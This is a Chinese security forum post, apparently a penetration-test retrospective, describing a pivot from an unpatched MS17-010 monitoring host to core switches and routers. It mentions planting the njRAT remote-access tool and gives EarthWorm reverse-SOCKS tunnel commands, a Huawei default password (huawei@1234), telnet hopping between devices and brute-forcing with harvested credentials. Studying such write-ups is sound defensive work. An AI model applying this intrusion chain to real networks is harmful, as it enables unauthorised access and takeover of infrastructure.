安全矩阵

 找回密码
 立即注册
搜索
查看: 2168|回复: 0

复盘从一个监控主机到核心路由沦陷

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-4-25 11:05:49 | 显示全部楼层 |阅读模式
原文链接:复盘从一个监控主机到核心路由沦陷

在对内网进行 ms17-010 扫描时,发现 2 台之前没有出现过且没有打补丁的主机,于是,尝试了一波

kali 主机在扫描时发现 2 台之前没有出现过且没有打补丁的主机

尝试打了一波

然后种了个 njrat

翻文件的时候发现了点配置文件


down 下来解压后发现是交换机的配置文件,于是有了一个大胆的想法

查看了被控主机的网络连接后,发现一个地址无法 ping 通,TCP 包也无法到达,推测做了 ACL

于是在被控机上搭了 earthworm 做转发
本机执行 ew -s rcsocks -l 本地代理端口 -e 远端连接端口
被控机执行 ew -s rssocks -d 主控机IP -e 远端连接端口

然后开启 proxifier 的代理功能,成功访问了那个系统,但这不是主要目的

在咨询了好哥们后,他建议尝试搞搞交换机看看
在对 10.2.66/24 网段扫描后发现 10.2.66.254 开放了 80 和 23 端口,尝试 xshell 连接

成功使用 huawei 密码 huawei@1234 连接,继续翻上级路由


发现了 10.2.20.1
继续 telnet

继续翻

发现 10.2.20.58

继续翻,翻到 10.4.0.1

继续 telnet

另外发现此时可以 ping 通 10.4.0.1 这台交换机

于是乎,扔浏览器打开看看



拿下后将本次收集到的密码与巡风扫描到的 telnet 主机进行爆破后发现了更多的交换机。。。。。。


作者:Sp4ce


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 04:26 , Processed in 0.014305 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表